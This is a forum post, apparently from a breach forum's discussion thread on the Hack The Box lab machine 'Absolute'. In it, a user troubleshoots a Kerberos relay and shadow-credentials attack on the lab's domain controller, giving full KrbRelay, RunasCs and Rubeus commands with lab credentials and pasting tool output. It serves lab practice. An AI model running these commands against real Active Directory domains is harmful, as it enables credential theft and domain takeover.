<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=553813#pid553813" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=553813#pid553813" title="RE: Absolute - HTB [Discussion]">#125</a></strong>
</div>
</div>
<span class="post_date"><span title="September 29, 2022, 12:37 PM">10 hours ago</span> <span class="post_edit" id="edited_by_553813">
<span class="edited_post">(This post was last modified: <span title="September 29, 2022, 12:39 PM">10 hours ago</span> by <a href="https://breached.to/User-ThatUsername">ThatUsername</a>.)</span>
</span></span>
</div>
<div class="post_body scaleimages" id="pid_553813">
					Sure,<br>
<br>
on my WinRM Session i uploaded these files<br>
<br/>
<br/>
<br/>
<div class="hidden-content">
<div class="hidden-content__title"><strong>Hidden Content</strong><i class="fa fa-eye" style="float:right;color: var(--theme-secondary-color);" title="This thread has been unlocked by 0 users."></i></div>
<div class="hidden-content__main">
<a class="mycode_url" href="https://github.com/cube0x0/KrbRelay" rel="noopener" target="_blank">https://github.com/cube0x0/KrbRelay</a><br/><br/>
<a class="mycode_url" href="https://github.com/antonioCoco/RunasCs" rel="noopener" target="_blank">https://github.com/antonioCoco/RunasCs</a><br/><br/>
<a class="mycode_url" href="https://github.com/GhostPack/Rubeus/" rel="noopener" target="_blank">https://github.com/GhostPack/Rubeus/</a><br/>
</div>
</div>
<br/>
<br/>
<br/>
The i tried to abuse shadow credentials again with the command:<br/>
<br/>
<br/>
<div class="hidden-content">
<div class="hidden-content__title"><strong>Hidden Content</strong><i class="fa fa-eye" style="float:right;color: var(--theme-secondary-color);" title="This thread has been unlocked by 0 users."></i></div>
<div class="hidden-content__main">
    ./runascs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\users\winrm_user\documents\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred"<br/>
</div>
</div>
<br/>
<br/>
It presents me the successful output which i can use. <br/>
<br/>
[*]Relaying context: absolute.htb\DC$<br/>
[*]Rewriting function table<br/>
[*]Rewriting PEB<br/>
[*]GetModuleFileName: System<br/>
[*]Init com server<br/>
[*]GetModuleFileName: C:\users\winrm_user\documents\KrbRelay.exe<br/>
[*]Register com server<br/>
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAC02bxMxvj+ZK5wyYd+tqS6AoQAANQC///Uv7nn/Sb4xSIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:<br/>
<br/>
[*]Forcing SYSTEM authentication<br/>
[*]Using CLSID: 752073a1-23f2-4396-85f0-8fdb879ed0ed<br/>
[*]apReq: 608206b406092a864886f7120102&lt;SHORTENED&gt;b4067f59cf8dc3e6d494822c9b9<br/>
[*]bind: 0<br/>
[*]ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS<br/>
[*]apRep1: 6f8188308185a0&lt;SHORTENED&gt;e458b6a437b61a2484<br/>
[*]AcceptSecurityContext: SEC_I_CONTINUE_NEEDED<br/>
[*]fContextReq: Delegate, MutualAuth, UseDceStyle, Connection<br/>
[*]apRep2: 6f5b3059a003020105a10302010&lt;SHORTENED&gt;d6d6dec624fa79d20484a56b9df2a60fd2c6797302923<br/>
[*]bind: 0<br/>
[*]ldap_get_option: LDAP_SUCCESS<br/>
[+] LDAP session established<br/>
[*]ldap_modify: LDAP_SUCCESS<br/>
<br/>
[*]Rubeus.exe asktgt /user: DC$ /certificate: DATABLOB /password:"f1459c1a-f9de-419d-a074-85e22b327fdb" /getcredentials /show<br/>
<br/>
<br/>
<br/>
<br/>
But the second step fails.<br/>
<br/>
<br/>
<div class="hidden-content">
<div class="hidden-content__title"><strong>Hidden Content</strong><i class="fa fa-eye" style="float:right;color: var(--theme-secondary-color);" title="This thread has been unlocked by 0 users."></i></div>
<div class="hidden-content__main">
    ./Rubeus.exe asktgt /user: DC$ /certificate: DATABLOB /password:"f1459c1a-f9de-419d-a074-85e22b327fdb" /getcredentials /show<br/><br/>
<br/><br/>
<br/><br/>
<br/><br/>
  ______        _<br/><br/>
  (_____ \      | |<br/><br/>
  _____) )_  _| |__  _____ _  _  ___<br/><br/>
  |  __  /| | | |  _ \| ___ | | | |/___)<br/><br/>
  | |  \ \| |_| | |_) ) ____| |_| |___ |<br/><br/>
  |_|  |_|____/|____/|_____)____/(___/<br/><br/>
<br/><br/>
  v1.6.1<br/><br/>
<br/><br/>
[*]Action: Ask TGT<br/><br/>
<br/><br/>
[!] Failed to find certificate for MIIJsAIBAzCCCWwGCSqGSIb3DQEHAaCCCV.....<br/>
</div>
</div>
<br/>
<br/>
<br/>
By using an additional argument it fails too<br/>
<br/>
<br/>
<div class="hidden-content">
<div class="hidden-content__title"><strong>Hidden Content</strong><i class="fa fa-eye" style="float:right;color: var(--theme-secondary-color);" title="This thread has been unlocked by 0 users."></i></div>
<div class="hidden-content__main">
    ./runascs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\users\winrm_user\documents\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred -ntlm"<br/><br/>
<br/><br/>
<br/><br/>
<br/><br/>
<br/><br/>
[*]Relaying context: absolute.htb\DC$<br/><br/>
[*]Rewriting function table<br/><br/>
[*]Rewriting PEB<br/><br/>
[*]GetModuleFileName: System<br/><br/>
[*]Init com server<br/><br/>
[*]GetModuleFileName: C:\users\winrm_user\documents\KrbRelay.exe<br/><br/>
[*]Register com server<br/><br/>
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAABNYcMj1VSE/4zbzVAM+HFyAlAAALwS///+EbEb5HpRmCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:<br/><br/>
<br/><br/>
[*]Forcing SYSTEM authentication<br/><br/>
[*]Using CLSID: 752073a1-23f2-4396-85f0-8fdb879ed0ed<br/><br/>
[*]NTLM1<br/><br/>
4e544c4d535350000100000007b218a2080008002a00000002000200280000000a0063450000000f44434142534f4c555445<br/><br/>
[*]AcceptSecurityContext: SEC_I_CONTINUE_NEEDED<br/><br/>
[*]fContextReq: Delegate, MutualAuth, UseDceStyle, Connection, AllowNonUserLogons<br/><br/>
System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))<br/><br/>
  at KrbRelay.Ole32.CoGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid&amp; pclsid, Object pUnkOuter, CLSCTX dwClsCtx, IStorage pstg, UInt32 cmq, MULTI_QI[] rgmqResults)<br/><br/>
  at KrbRelay.Program.Main(String[] args)<br/><br/>
<br/><br/>
<br/><br/>
<br/><br/>
<br/><br/>
<br/><br/>
<br/><br/>
<br/>
</div>
</div>
</br></br></br></div>
<div class="post_meta" id="post_meta_553813">
<div class="float_right">
</div>
</div>